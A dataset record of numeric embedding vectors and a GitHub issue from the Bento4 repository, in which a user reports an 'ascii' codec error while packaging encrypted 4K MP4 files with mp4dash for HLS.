0.0027154511772096157, 0.016441497951745987, -0.014053389430046082, 0.01952148973941803, 0.0019677721429616213, 0.01742352545261383, -0.0020644869655370712, -0.008600168861448765, -0.016962271183729172, 0.0031041698530316353, -0.0072573223151266575, -0.006308774463832378, 0.018539464101195335, -0.0025778186973184347, 0.016753962263464928, -0.00959707424044609, -0.008488574996590614, -0.001661818940192461, 0.032287828624248505, 0.008488574996590614, -0.015206526964902878, -0.0018050310900434852, -0.0003052557585760951, 0.015139570459723473, 0.013435903936624527, -0.006293895188719034, -0.008324903436005116, 0.005029164254665375, 0.013912037946283817, 0.024282829836010933, -0.012513394467532635, -0.016307586804032326, -0.007878527976572514, 0.001727845286950469, -0.00012228830019012094, 0.014953580684959888, -0.01697714999318123, -0.004828295204788446, 0.024372104555368423, 0.003721656044945121, -0.011590884998440742, 0.015623143874108791, -0.01278865896165371, 0.007368916179984808, -0.006900222040712833, 0.008615047670900822, 0.024833358824253082, 0.011881029233336449, -0.0008123104926198721, -0.004928729962557554, -0.019685160368680954, -0.021902158856391907, 0.00381651078350842, -0.004419117700308561, 0.011211465112864971, 0.003355256048962474, -0.019536368548870087, 0.00461998675018549, 0.008451377041637897, 0.018494825810194016, 0.02279490977525711, -0.017185458913445473, 0.01101059652864933, 0.024535775184631348, 0.015846330672502518, -0.020101778209209442, 0.015117251314222813, 0.017125941812992096, 0.01766159199178219, 0.0040768967010080814, 0.006558000575751066, 0.0014191021909937263, 0.02356862835586071, -0.0008908911840990186, -0.0014181722654029727, -0.015563626773655415, 0.012937450781464577, -0.007967803627252579, 0.011583445593714714, -0.004285205155611038, 0.001795731601305306, 0.009649151004850864, 0.0030204744543880224, -0.028508517891168594, 0.003364555537700653, 0.020964771509170532, 0.0017464442644268274, 0.006610077805817127, -0.015236284583806992, 0.004939889069646597, -0.005613172426819801, 0.011925666593015194, -0.007089931517839432, -0.0033533961977809668, -0.01360701397061348, 0.020354723557829857, -0.006089306436479092, -0.0009159998153336346, 0.0043819197453558445, 0.005456940736621618, -0.0009383185533806682, 0.017810383811593056, 0.012491075322031975, 0.00657287985086441, -0.0172449741512537, -0.0003154852020088583, 0.005137038417160511, 0.00354868546128273, -0.016634928062558174, -0.014499764889478683, 0.0030818511731922626, 0.02538388967514038, -0.007833890616893768, -0.007149448152631521, -0.00340175349265337, -0.013636772520840168, 0.00331619824282825, 0.004835735075175762, -0.005665249656885862, 0.009559876285493374, -0.00407317653298378, 0.02780919522047043, -0.008964709006249905, 0.008257947862148285, -0.002319292863830924, -0.0013726047473028302, -0.015563626773655415, -0.013659091666340828, -0.013227595016360283, 0.007357756607234478, 0.009292050264775753, -0.0004440506745595485, -0.003000015625730157, -0.017408646643161774, 0.012736582197248936, -0.000543090223800391, -0.00909862108528614, 0.009068862535059452, 0.0022858146112412214, 0.0046571847051382065, 0.0028140258509665728, 0.005877277813851833, 0.01987859047949314, -0.005044043529778719, 0.012959769926965237, -0.018093088641762733, -0.0067477100528776646, -0.0054718200117349625, 0.01328711211681366, -0.00923997350037098, 0.00016204362327698618, -0.0030316337943077087, 0.011583445593714714, -0.01583145186305046, -0.0005840079975314438, 0.021262355148792267, -0.020905254408717155, -0.020191052928566933, -0.01711106300354004, -0.012877934612333775, 0.00004702054866356775, -0.008629927411675453, 0.025145821273326874, -0.009455721825361252, 0.0014107326278463006, 0.01517676841467619, -0.0029907161369919777, 0.012438998557627201, 0.0167985986918211, 0.0014711794210597873, 0.008562970906496048, -0.007863649167120457, -0.0047501795925199986, -0.0055759744718670845, -0.009634272195398808, -0.003042793134227395, 0.011181707493960857, 0.03954887390136719, 0.0201166570186615, 0.023955486714839935, -0.005315588787198067, -0.025726109743118286, -0.019640523940324783, -0.02306273579597473, -0.006491044070571661, -0.0026038573123514652, 0.012245568446815014, -0.0070341345854103565, -0.0000463521464553196, -0.0041178143583238125, 0.006152542773634195, 0.025651713833212852, 0.007774373982101679, -0.005148197989910841, 0.004694382660090923, -0.015459472313523293, -0.0021054046228528023, 0.017006907612085342, -0.0012070738011971116, 0.044518519192934036, 0.022303897887468338, -0.01919414848089218, 0.00022911619453225285, -0.02020593173801899, -0.000033042251743609086, -0.00030223344219848514, -0.002817745553329587, -0.00479109724983573, 0.005836360156536102, -0.013294551521539688, 0.007737176027148962, 0.014038510620594025, -0.025413647294044495, -0.004597668070346117, -0.013978993520140648, -0.004385639447718859, 0.0009717967477627099, 0.003593323053792119, -0.0034445312339812517, 0.0058512394316494465, 0.009507798589766026, -0.04026307165622711, 0.014075708575546741, 0.010110406205058098, 0.010549342259764671, 0.023092495277523994, -0.01501309685409069, 0.0044860742054879665, 0.004430277273058891, 0.01264730654656887, 0.012796098366379738, -0.003273420501500368, -0.030383294448256493, -0.002045887755230069, 0.010229439474642277, 0.017125941812992096, 0.007413553539663553, 0.009857459925115108, 0.018643617630004883, 0.017230095341801643, 0.008845674805343151, -0.011025475338101387, 0.006133943796157837, -0.03103797882795334, 0.002683833008632064, 0.008815917186439037, -0.01410546712577343, 0.014626238495111465, -0.006829545833170414, -0.02129211276769638, -0.007606983184814453, -0.009448282420635223, 0.009842580184340477, 0.013941795565187931, 0.014908943325281143, -0.020949892699718475, -0.01865849830210209, 0.005683848634362221, -0.01019224151968956, 0.0027991465758532286, -0.0004938029451295733, 0.003783032763749361, 0.014700634405016899, -0.010385670699179173, 0.00015844005974940956, 0.010207120329141617, 0.0014163124142214656, -0.014202181249856949, 0.009790503419935703, -0.006059547886252403, 0.010512144304811954, -0.016545653343200684, 0.0000039777114579919726, 0.007766934111714363, -0.02475896291434765, -0.008324903436005116, -0.002724750665947795, -0.004593948367983103, -0.004400518722832203, -0.01447000727057457, 0.003085570875555277, 0.01551898941397667, -0.006855584215372801, 0.011367697268724442, -0.008600168861448765, 0.006066987290978432, 0.017988933250308037, 0.006245537661015987, 0.029743490740656853, 0.00948548037558794, -0.002773107960820198, -0.003509627655148506, 0.01711106300354004, 0.01219349168241024, 0.014827107079327106, -0.0034129128325730562, 0.00114011752884835, -0.0018412991194054484, 0.01642661914229393, 0.0031078895553946495, 0.01526604313403368, 0.01526604313403368, 0.001965912291780114, -0.01112219039350748, 0.006684473715722561, -0.022824669256806374, 0.009336688555777073, 0.0038909066934138536, 0.004991966299712658, 0.00574336526915431, 0.015429714694619179, 0.0116057638078928, 0.0016236910596489906, 0.008458816446363926, 0.02007202059030533, 0.013309430330991745, 0.01606951840221882, -0.008295145817101002, -0.002309993375092745, 0.014566721394658089, 0.017036667093634605, -0.011047794483602047, -0.010601419024169445, -0.009158138185739517, -0.008600168861448765, -0.006650995463132858, -0.0019677721429616213, 0.004482354503124952, -0.02292882278561592, -0.0017371447756886482, -0.026767652481794357, 0.019625645130872726, 0.015846330672502518, 0.006710512097924948, -0.00693741999566555, -0.00015320909733418375, 0.0008899612003006041, 0.011159388348460197, 0.001999390311539173, -0.02370254136621952, -0.014261698350310326, -0.021440904587507248, -0.010690693743526936, 0.0027061516884714365, -0.001697156927548349, -0.002914460375905037, -0.00862248707562685, 0.01467087585479021, -0.01742352545261383, -0.0014404910616576672, -0.021559938788414, 0.038507331162691116, 0.012870494276285172, -0.0049324496649205685, 0.0018524584593251348, 0.01720033772289753, -0.023003218695521355, 0.002678253222256899, -0.005739645566791296, 0.021440904587507248, 0.014164983294904232, 0.003691897727549076, -0.0030297739431262016, 0.017944296821951866, 0.008518333546817303, -0.020920133218169212, 0.01770623028278351, -0.027972867712378502, 0.011174267157912254, 0.006316213868558407, 0.00985002052038908, -0.012453877367079258, 0.01642661914229393, -0.009931855835020542, 0.015980243682861328, 0.024416740983724594, 0.0011903347913175821, 0.009269732050597668, -0.0037997716572135687, -0.0038871869910508394, -0.006766309030354023, -0.0016952970763668418, 0.021009407937526703, -0.006863024085760117, 0.019461972638964653, -0.008585289120674133, 0.00039220601320266724, -0.004965927917510271, -0.005393704399466515, -0.006591478828340769, 0.014112906530499458, 0.007766934111714363, 0.01362933311611414, -0.008124034851789474, 0.0069820573553442955, 0.009299490600824356, 0.0023750897962599993, -0.020711824297904968, -0.02184264361858368, -0.004567909520119429, -0.010474946349859238, 0.025696352124214172, -0.006130224093794823, 0.007856209762394428, -0.04410190135240555, -0.004203369840979576, -0.011070113629102707, 0.0076255821622908115, -0.0049212900921702385, -0.007495389319956303, 0.018450189381837845, 0.023776937276124954, 0.012595229782164097, -0.008570410311222076, 0.003135788021609187, 0.012699384242296219, 0.012915132567286491, -0.009820261970162392, -0.015429714694619179, -0.015139570459723473, 0.013577255420386791, -0.008540651760995388, 0.002678253222256899, 0.004727860912680626, 0.0022839547600597143, -0.0023006938863545656, -0.003453830722719431, 0.0021128442604094744, 0.006290175020694733, 0.0012628707336261868, 0.004712981637567282, 0.0020589071791619062, 0.005337907467037439, 0.0009438982815481722, 0.008659685030579567, -0.012520833872258663, -0.01682835817337036, -0.005520177539438009, 0.008912631310522556, -0.005668969359248877, 0.031157013028860092, 0.008741521276533604, -0.011687599122524261, 0.020042261108756065, 0.00001871522363217082, 0.01098827738314867, -0.0066137975081801414, 0.02334544062614441, 0.004500953480601311, 0.02261636033654213, 0.02234853431582451, 0.0035338064190000296, 0.009567315690219402, 0.010259198024868965, 0.01760207489132881, 0.008659685030579567, 0.002903300803154707, 0.006591478828340769, -0.018405551090836525, -0.0006542191258631647, -0.006855584215372801, 0.02197655476629734, -0.0022076989989727736, -0.0028010064270347357, 0.00610790541395545, -0.003773733275011182, 0.0013307570479810238, 0.044161420315504074, -0.017408646643161774, 0.00969378836452961, -0.007841330021619797, -0.004694382660090923, -0.012840736657381058, -0.012699384242296219, 0.02498215064406395, 0.005211434327065945, -0.001074091182090342, -0.0066137975081801414, -0.0035710043739527464, 0.005970272701233625, 0.00973842665553093, -0.002311853226274252, -0.00296281767077744, 0.023762058466672897, 0.0016329905483871698, -0.00973842665553093, -0.01146441139280796, 0.004995686002075672, -0.018807290121912956, 0.008957268670201302, 0.00454931054264307, 0.0009155347943305969, -0.011806633323431015, -0.008964709006249905, 0.0015864931046962738, -0.022512206807732582, 0.01399387326091528, -0.001993810757994652, -0.010363351553678513, -0.004199649672955275, -0.006152542773634195, 0.013049044646322727, -0.015459472313523293, -0.014150104485452175, 0.00014344463124871254, -0.010251757688820362, 0.008451377041637897, -0.011568565852940083, -0.007089931517839432, -0.018866805359721184, -0.0013409864623099566, 0.012877934612333775, 0.0201166570186615, -0.019640523940324783, 0.012744021601974964, -0.017825262621045113, 0.005189115647226572, -0.016441497951745987, 0.023226406425237656, -0.00526723125949502, -0.00218352023512125, -0.006398049183189869, -0.00909862108528614, -0.03062136098742485, 0.0023341721389442682, 0.02865730971097946, 0.005133318714797497, 0.02794310823082924, 0.016843236982822418, -0.004151292610913515, 0.008570410311222076, 0.009931855835020542, 0.00003777918027481064, -0.021946797147393227, -0.014365852810442448, 0.007670219521969557, -0.00474274018779397, 0.0011280281469225883, -0.014380731619894505, -0.005423462949693203, -0.014038510620594025, -0.00273033045232296, 0.003275280585512519, -0.004746459890156984, 0.004214528948068619, 0.0017111061606556177, -0.0016274107620120049, 0.0027545089833438396, 0.00454931054264307, 0.019417336210608482, 0.02007202059030533, 0.014908943325281143, 0.0021983995102345943, -0.014760150574147701, 0.013391265645623207, 0.0013512159930542111, 0.004753899294883013, -0.004939889069646597, -0.01742352545261383, -0.02580050565302372, -0.013049044646322727, 0.0028084460645914078, 0.006889062467962503, -0.00045637247967533767, 0.0118289515376091, -0.002918180078268051, -0.02074158377945423, 0.019328061491250992, 0.025175580754876137, 0.01583145186305046, 0.010794848203659058, -0.01901559717953205, -0.0020198493730276823, -0.004753899294883013, -0.017899658530950546, 0.02484823763370514, -0.02394060790538788, -0.0018264198442921042, -0.014827107079327106, -0.022036071866750717, -0.000003875998572766548, 0.0040136598981916904, -0.012290206737816334, -0.005520177539438009, -0.038923945277929306, -0.017036667093634605, 0.022854426875710487, 0.01197030395269394, 0.009864899329841137, 0.010102965869009495, -0.018598981201648712, 0.007123409770429134, -0.012974648736417294, 0.025264855474233627, 0.008406739681959152, 0.01609927788376808, -0.024773841723799706, -0.009991372004151344, 0.0122158108279109, -0.006372010800987482, -0.014164983294904232, 0.0539519228041172, 0.005966552998870611, 0.020994529128074646, 0.004794817417860031, 0.0014432809548452497, 0.013421024195849895, 0.004035978578031063, -0.017259854823350906, -0.0016283408040180802, -0.002417867537587881, -0.015623143874108791, -0.009411084465682507, 0.017959175631403923, -0.008964709006249905, 0.001665538758970797, 0.006256697233766317, -0.005546215921640396, 0.004359601065516472, -0.002832624828442931, -0.013904597610235214, -0.01910487376153469, 0.007781813386827707, 0.021723609417676926, -0.03145459666848183, -0.006881623063236475, 0.00853321235626936, 0.006781188305467367, -0.013599574565887451, -0.004274045582860708, -0.01861386001110077, 0.018896564841270447, -0.021902158856391907, -0.005992591381072998, 0.021173080429434776, 0.004430277273058891, 0.024148916825652122, 0.008354661986231804, 0.015072613954544067, 0.0016525194514542818, -0.001776202698238194, -0.02639567293226719, 0.012624988332390785, -0.006598918233066797, 0.0007579084485769272, 0.004088055808097124, 0.0032213435042649508, 0.010541901923716068, 0.003939263988286257, 0.019461972638964653, 0.015385076403617859, 0.009158138185739517, 0.008183551020920277, -0.020086899399757385, 0.0052597918547689915, -0.004288924857974052, -0.007662780117243528, -0.0006983916973695159, 0.00023457963834516704, 0.007104810792952776, -0.014112906530499458, -0.009359006769955158, -0.009530117735266685, -0.00839185994118452, 0.004181050695478916, -0.03002619370818138, -0.013525178655982018, 0.006438967306166887, 0.01587609015405178, -0.022259259596467018, 0.006186021026223898, 0.0007076911861076951, 0.01629270613193512, -0.00015111672109924257, -0.000543090223800391, -0.030145227909088135, -0.020771341398358345, 0.025532681494951248, -0.0027972867246717215, 0.015593385323882103, 0.008562970906496048, -0.018643617630004883, -0.013696289621293545, 0.021455783396959305, 0.0038946266286075115, -0.015094933100044727, -0.007752055302262306, -0.01837579347193241, -0.005092401057481766, -0.004121534060686827, 0.008376981131732464, 0.009946734644472599, -0.004545590840280056, -0.0170217864215374, 0.0041289739310741425, 0.024089399725198746, -0.016887875273823738, -0.008585289120674133, -0.01983395218849182, 0.003556125098839402, 0.018316276371479034, 0.008354661986231804, 0.02938639000058174, -0.015325560234487057, -0.005062642507255077, 0.015801694244146347, -0.026767652481794357, -0.010541901923716068, -0.013584695756435394, -0.01328711211681366, 0.008481135591864586, 0.014098027721047401, -0.009969053789973259, -0.014284017495810986, -0.0011224484769627452, -0.0004335887497290969, 0.0005137968109920621, -0.0002840994275175035, -0.010296395979821682, -0.006040948908776045, -0.007123409770429134, -0.00960451364517212, -0.010817167349159718, 0.029059046879410744, 0.019119752570986748, 0.0037402550224214792, -0.010199680924415588, -0.000954127695877105, 0.017795505002141, 0.004969647619873285, 0.016322465613484383, -0.010660936124622822, -0.022318776696920395, 0.03190097212791443, 0.01910487376153469, 0.010095526464283466, 0.00923997350037098, -0.014745271764695644, 0.0038834670558571815, 0.02597905695438385, -0.0024067081976681948, -0.0201166570186615, 0.052434246987104416, -0.0024327465798705816, -0.011479291133582592, -0.003924384713172913, 0.01974467746913433, -0.0088977525010705, 0.001068511395715177, -0.007997561246156693, -0.014938700944185257, -0.006368291098624468, 0.004623706452548504, 0.020458878949284554, 0.007960363291203976, -0.004512112587690353, -0.014150104485452175, 0.040649931877851486, 0.008012440986931324, -0.015139570459723473, 0.01185127068310976, -0.0026652340311557055, -0.01019224151968956, -0.0055759744718670845, 0.014112906530499458, 0.0012675204779952765, 0.0011122190626338124, 0.00024713395396247506, -0.005668969359248877, 0.010601419024169445, -0.0019287143368273973, -0.028225813060998917, -0.006089306436479092, 0.017572317272424698, -0.019938107579946518, -0.00011357002222212031, 0.016902754083275795, 0.009143258444964886, 0.00982770137488842, 0.01810796745121479, 0.0023378918413072824, 0.017230095341801643, -0.011747116222977638, -0.01481222826987505, 0.011985182762145996, 0.022780030965805054, 0.00033617657027207315, -0.0167985986918211, -0.019119752570986748, 0.002827045042067766, 0.0033013189677149057, 0.007540026679635048, -0.03306154906749725, 0.010036010295152664, 0.007863649167120457, -0.01847994700074196, 0.0244316216558218, 0.019908348098397255, 0.01362933311611414, 0.015667781233787537, -0.0017176158726215363, 0.006770028732717037, -0.010504703968763351, -0.009150698781013489, 0.015489230863749981 ]
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
I transcoded the file in .mp4 format in Mediaconvert and trying to package it through bento4. During Video packaging I am getting below error, ERROR: 'ascii' codec can't encode characters in position 66-71: ordinal not in range(128) Am using below command, /root/bento4/Bento4-SDK-1-6-0-637.x86_64-unknown-linux/bin/mp4dash --force --verbose --hls --hls-master-playlist-name=index.m3u8 --encryption-cenc-scheme cbcs --encryption-key=965e4ff127a14b868d4d83060a5e51d0:ef9da875c749ce588da07d8516aaa116:965e4ff127a14b868d4d83060a5e51d0 --fairplay-key-uri=skd://965e4ff127a14b868d4d83060a5e51d0 360p_fragmp4.mp4 480p_fragmp4.mp4 576p_fragmp4.mp4 720lowp_fragmp4.mp4 720highp_fragmp4.mp4 1080lowp_fragmp4.mp4 1080highp_fragmp4.mp4 1440p_fragmp4.mp4 2160lowp_fragmp4.mp4 2160highp_fragmp4.mp4 -o Output_4K_CMAF_DRM -f
Getting ERROR while packaging 4K mp4 files using Bento4 'ascii' codec can't encode characters in position 66-71: ordinal not in range(128)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/692/comments
1
2022-04-11T05:30:50
2022-05-01T19:49:32Z
https://github.com/axiomatic-systems/Bento4/issues/692
1,199,416,621
692
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Getting ERROR while packaging 4K mp4 files using Bento4 'ascii' codec can't encode characters in position 66-71: ordinal not in range(128) Issue date: --- start body --- I transcoded the file in .mp4 format in Mediaconvert and trying to package it through bento4. During Video packaging I am getting below error, ERROR: 'ascii' codec can't encode characters in position 66-71: ordinal not in range(128) Am using below command, /root/bento4/Bento4-SDK-1-6-0-637.x86_64-unknown-linux/bin/mp4dash --force --verbose --hls --hls-master-playlist-name=index.m3u8 --encryption-cenc-scheme cbcs --encryption-key=965e4ff127a14b868d4d83060a5e51d0:ef9da875c749ce588da07d8516aaa116:965e4ff127a14b868d4d83060a5e51d0 --fairplay-key-uri=skd://965e4ff127a14b868d4d83060a5e51d0 360p_fragmp4.mp4 480p_fragmp4.mp4 576p_fragmp4.mp4 720lowp_fragmp4.mp4 720highp_fragmp4.mp4 1080lowp_fragmp4.mp4 1080highp_fragmp4.mp4 1440p_fragmp4.mp4 2160lowp_fragmp4.mp4 2160highp_fragmp4.mp4 -o Output_4K_CMAF_DRM -f --- end body ---
1,076
[ -0.02802283503115177, 0.01232978142797947, -0.015859222039580345, 0.025882570073008537, 0.037780310958623886, 0.0066401357762515545, -0.023409968242049217, 0.03578627482056618, -0.035467229783535004, -0.013074221089482307, 0.046235017478466034, -0.03131963685154915, -0.012110437266528606, 0.004975116811692715, 0.01429058238863945, 0.01291469857096672, -0.03174503147602081, 0.007909671403467655, -0.02286493219435215, 0.008102428168058395, 0.01915602758526802, 0.0010576692875474691, 0.04174179211258888, 0.031585510820150375, -0.010867489501833916, 0.0034530034754425287, -0.008693991228938103, 0.015739580616354942, 0.009837238118052483, -0.009451724588871002, 0.008222069591283798, -0.004569662734866142, -0.009671068750321865, 0.021974261850118637, 0.047192156314849854, 0.010588324628770351, 0.056152015924453735, 0.0625329315662384, -0.005709586199373007, 0.011306176893413067, -0.021588748320937157, -0.04373582825064659, -0.015221131965517998, 0.02457980066537857, -0.014077885076403618, 0.0269460566341877, -0.011804685927927494, 0.02255917899310589, -0.023409968242049217, -0.037381503731012344, 0.015752874314785004, -0.03209066390991211, -0.023582784458994865, -0.05769407004117966, 0.02773037552833557, -0.031000593677163124, 0.03801959380507469, 0.029644649475812912, 0.01611180044710636, 0.06577655673027039, -0.02019292488694191, -0.022040730342268944, 0.03740809112787247, 0.030256154015660286, 0.007583978585898876, 0.014250701293349266, -0.007690327242016792, 0.012409542687237263, -0.035095009952783585, 0.04716556891798973, 0.008507881313562393, 0.003202087478712201, 0.02932560443878174, 0.060246434062719345, -0.005018320865929127, -0.047192156314849854, 0.04692628234624863, 0.005603237543255091, -0.02876727469265461, 0.03831205517053604, -0.004586279857903719, -0.004137622192502022, -0.03150574862957001, 0.015074902214109898, 0.0484151616692543, 0.03246288374066353, -0.03445691987872124, -0.05476948618888855, -0.040226325392723083, -0.03836522623896599, 0.018079247325658798, 0.018318532034754753, 0.02267882227897644, -0.015141370706260204, 0.0027916484978049994, 0.03562675416469574, -0.03669023886322975, -0.007291520480066538, -0.029750997200608253, -0.04591597244143486, -0.028315292671322823, 0.0007249147165566683, 0.01858440414071083, -0.04647430405020714, 0.011678396724164486, -0.014875498600304127, 0.01821218430995941, -0.026932762935757637, 0.008580995723605156, 0.09018354117870331, 0.006636812351644039, 0.0019807410426437855, 0.008202129043638706, 0.009491605684161186, -0.009637834504246712, -0.009558073244988918, -0.002602215390652418, -0.053785763680934906, -0.009092798456549644, 0.019102852791547775, 0.012595652602612972, -0.021110180765390396, -0.012429483234882355, 0.012748528271913528, -0.00459957355633378, 0.04705921933054924, -0.006703279912471771, -0.003429739736020565, 0.02077784202992916, -0.010774434544146061, -0.03677000105381012, -0.024154407903552055, -0.008501234464347363, 0.012921345420181751, -0.021309584379196167, -0.004031273536384106, -0.03451009467244148, 0.013240390457212925, 0.02562999352812767, 0.011538813821971416, -0.02162862941622734, -0.004898678511381149, 0.05118022486567497, 0.006267915945500135, -0.021203236654400826, -0.0033616102300584316, 0.008740519173443317, -0.005815934389829636, -0.00399803975597024, -0.012402895838022232, -0.0403592623770237, -0.03724856674671173, -0.0036490834318101406, 0.029564887285232544, 0.05694963037967682, 0.018252065405249596, -0.01801278069615364, 0.02818235754966736, 0.008361652493476868, 0.021402638405561447, 0.009332082234323025, -0.0007087131962180138, 0.04171520471572876, -0.02277187630534172, 0.03294145315885544, -0.005483595654368401, 0.012077203951776028, 0.002755091292783618, -0.017946312204003334, 0.022599060088396072, 0.014117766171693802, -0.012210139073431492, 0.0034496800508350134, -0.00999676063656807, -0.05992738902568817, -0.029777584597468376, 0.015167957171797752, 0.04474613815546036, 0.0063210902735590935, -0.0011257987935096025, -0.04998380318284035, -0.010860842652618885, 0.056258365511894226, 0.020511969923973083, 0.05009015277028084, -0.018650870770215988, 0.039960455149412155, -0.055673450231552124, 0.05535440519452095, 0.023888535797595978, 0.022439537569880486, 0.04642112925648689, -0.010275925509631634, -0.03238312527537346, 0.01347302831709385, 0.00348956068046391, -0.02638772688806057, -0.03591921180486679, -0.016550488770008087, 0.026440899819135666, 0.019129440188407898, -0.01195756159722805, -0.010561737231910229, -0.026427606120705605, -0.028714099898934364, 0.017839964479207993, -0.025417296215891838, 0.03724856674671173, 0.021575456485152245, 0.010707966051995754, -0.013001106679439545, -0.0231573898345232, 0.017015762627124786, 0.04264575615525246, 0.0176139734685421, -0.004609543364495039, -0.032914865761995316, 0.012881464324891567, -0.020698079839348793, 0.006500553339719772, -0.0070123556070029736, -0.005945547018200159, 0.015460415743291378, -0.002750106155872345, -0.026228202506899834, -0.030256154015660286, -0.023117508739233017, -0.003968128934502602, -0.02362266555428505, -0.0005325734382495284, 0.039667997509241104, 0.013559436425566673, -0.02715875208377838, -0.02972441166639328, 0.02649407461285591, 0.013300211168825626, 0.007763441652059555, -0.01252253819257021, -0.054450441151857376, 0.010029994882643223, -0.02791648544371128, 0.034536682069301605, 0.002932892646640539, -0.0031306345481425524, 0.013931656256318092, 0.050063565373420715, -0.012456070631742477, 0.01895662397146225, -0.029777584597468376, -0.006932593882083893, -0.01934213750064373, -0.005576650612056255, 0.04251281917095184, 0.025310946628451347, -0.009784063324332237, 0.02703911066055298, 0.046341367065906525, 0.02255917899310589, 0.017667148262262344, -0.03780689835548401, 0.006636812351644039, 0.011266295798122883, -0.010455388575792313, -0.03775372356176376, 0.02189450152218342, -0.034802552312612534, -0.049106426537036896, -0.005300809163600206, -0.03286169096827507, -0.014237407594919205, 0.0029195991810411215, -0.0192490816116333, -0.01734810136258602, -0.032781932502985, -0.014689388684928417, -0.001826203428208828, 0.01971435733139515, 0.00904627051204443, 0.003818576456978917, 0.00338155054487288, -0.006945887580513954, 0.020498676225543022, 0.0015079887816682458, 0.036610476672649384, 0.012881464324891567, -0.04570327699184418, -0.033685892820358276, -0.029511714354157448, -0.029591474682092667, -0.010335746221244335, 0.02725180797278881, 0.031372811645269394, -0.042433060705661774, 0.003858457086607814, -0.019767530262470245, -0.0057893474586308, 0.007730207871645689, 0.03974775969982147, 0.03238312527537346, 0.023649251088500023, -0.025510350242257118, 0.003984746057540178, 0.010501916520297527, -0.021974261850118637, -0.023795481771230698, -0.005609884392470121, -0.025217892602086067, 0.001215530326589942, -0.0005520983831956983, -0.010422155261039734, 0.0457298643887043, -0.01433046255260706, -0.022133786231279373, -0.003722198074683547, -0.020498676225543022, 0.0036224965006113052, 0.006699956487864256, -0.02685300074517727, -0.038338642567396164, 0.016842946410179138, -0.029857346788048744, 0.032356537878513336, -0.03865768760442734, 0.01409117877483368, -0.007583978585898876, -0.016510607674717903, -0.02475261688232422, 0.008035959675908089, -0.02201414294540882, 0.013612610287964344, 0.017414569854736328, -0.007464336697012186, 0.0298041719943285, 0.006636812351644039, 0.012176905758678913, -0.006430761888623238, -0.04525129497051239, -0.029192667454481125, 0.033579543232917786, -0.01857111044228077, 0.0020339153707027435, -0.001512973802164197, 0.0035726455971598625, -0.020219512283802032, 0.024712737649679184, 0.02068478614091873, 0.00735798804089427, 0.030442263931035995, 0.03440374508500099, -0.0003672347229439765, 0.000874882738571614, -0.005702939350157976, 0.01257571205496788, 0.009258967824280262, 0.006118363235145807, -0.062160708010196686, 0.014729269780218601, 0.013240390457212925, 0.009524838998913765, 0.03419104963541031, -0.03174503147602081, -0.01903638429939747, -0.010734553448855877, 0.013692371547222137, 0.03294145315885544, -0.0028597782365977764, 0.007796675898134708, 0.022652234882116318, 0.015938984230160713, -0.015659818425774574, 0.003419769462198019, 0.02192108891904354, -0.04163544625043869, 0.025789516046643257, -0.01668342389166355, -0.027172045782208443, 0.0156332328915596, -0.026547249406576157, -0.03865768760442734, 0.0200068149715662, -0.015114783309400082, 0.006919300649315119, -0.000361834216164425, -0.025098251178860664, -0.0024493392556905746, 0.022506006062030792, -0.014170940034091473, 0.004283851478248835, -0.02839505486190319, -0.04038584977388382, -0.011266295798122883, 0.021588748320937157, -0.036716826260089874, -0.06556386500597, -0.05195125192403793, 0.037115633487701416, 0.007770088501274586, -0.004224030300974846, 0.015261012129485607, -0.038258880376815796, 0.009631187655031681, -0.01583263650536537, 0.03020297922194004, 0.017959605902433395, -0.0011000424856320024, -0.006374264135956764, 0.011625222861766815, -0.020924070850014687, 0.031372811645269394, -0.0019026414956897497, -0.007298166863620281, 0.019940346479415894, 0.01252918504178524, -0.019927052780985832, 0.008374946191906929, 0.023941710591316223, 0.00386842736043036, 0.04070489481091499, -0.023024454712867737, 0.03076130896806717, 0.026533955708146095, -0.019315550103783607, -0.018903449177742004, -0.013971536420285702, 0.030974006280303, 0.029299017041921616, -0.029033144935965538, 0.021974261850118637, 0.013878481462597847, -0.024247461929917336, -0.012755175121128559, -0.035972386598587036, 0.00371555145829916, 0.017161991447210312, 0.019195906817913055, -0.0034164462704211473, -0.02428734302520752, -0.005599914118647575, -0.02180144563317299, 0.012622239999473095, -0.02685300074517727, -0.0032220277935266495, -0.008022665977478027, -0.011638515628874302, -0.009219086728990078, -0.009445077739655972, -0.018438173457980156, -0.03086765669286251, 0.009511545300483704, -0.021841326728463173, 0.029644649475812912, 0.049000080674886703, 0.007019001990556717, -0.0027135489508509636, -0.000491861894261092, -0.008202129043638706, -0.018610991537570953, 0.009418490342795849, 0.054716311395168304, -0.005899019539356232, 0.00007129713048925623, -0.02057843841612339, 0.005779377184808254, 0.007803322747349739, 0.057215504348278046, -0.02564328722655773, -0.008587642572820187, -0.03326049819588661, 0.00923902727663517, -0.02017963118851185, -0.0034230928868055344, -0.014769150875508785, 0.003941542003303766, -0.01952824741601944, -0.0031505748629570007, 0.02294469252228737, 0.0022648910526186228, -0.013007753528654575, 0.018823686987161636, -0.03203749284148216, -0.012589005753397942, -0.024340517818927765, 0.0019209200982004404, -0.015925690531730652, -0.010528502985835075, -0.005736173130571842, -0.05094094201922417, 0.007903024554252625, -0.01846476085484028, -0.013891775161027908, 0.034536682069301605, 0.011512227356433868, 0.023981591686606407, -0.021189942955970764, 0.010029994882643223, 0.01894333027303219, -0.00402130326256156, 0.0011241370812058449, -0.011605282314121723, 0.0075972722843289375, -0.006779718212783337, 0.0041243284940719604, 0.02411452680826187, 0.01647072657942772, 0.029192667454481125, -0.009225733578205109, -0.03496207669377327, 0.05593932047486305, -0.018624283373355865, -0.01157204806804657, -0.002851469675078988, -0.004287174437195063, -0.007384575437754393, 0.014436811208724976, -0.06237340718507767, -0.028527989983558655, 0.016882827505469322, 0.028235532343387604, 0.022054024040699005, -0.0012471025111153722, -0.010515210218727589, -0.014024711214005947, -0.007231699302792549, 0.012396248988807201, 0.01429058238863945, -0.004828887525945902, 0.02067149244248867, 0.00035871853469870985, 0.017547504976391792, -0.014277288690209389, -0.015114783309400082, -0.017308222129940987, 0.013453087769448757, 0.02210719883441925, -0.020073283463716507, 0.01583263650536537, -0.0010526841506361961, -0.010315806604921818, -0.0015811033081263304, -0.010980484075844288, -0.01725504733622074, 0.056258365511894226, -0.038258880376815796, 0.0025158070493489504, -0.053014736622571945, 0.0034928841050714254, -0.004676011390984058, 0.004273881204426289, 0.00431043840944767, -0.012808349914848804, 0.019488366320729256, -0.017866551876068115, 0.01791972480714321, 0.0011000424856320024, 0.007404515519738197, 0.010123049840331078, 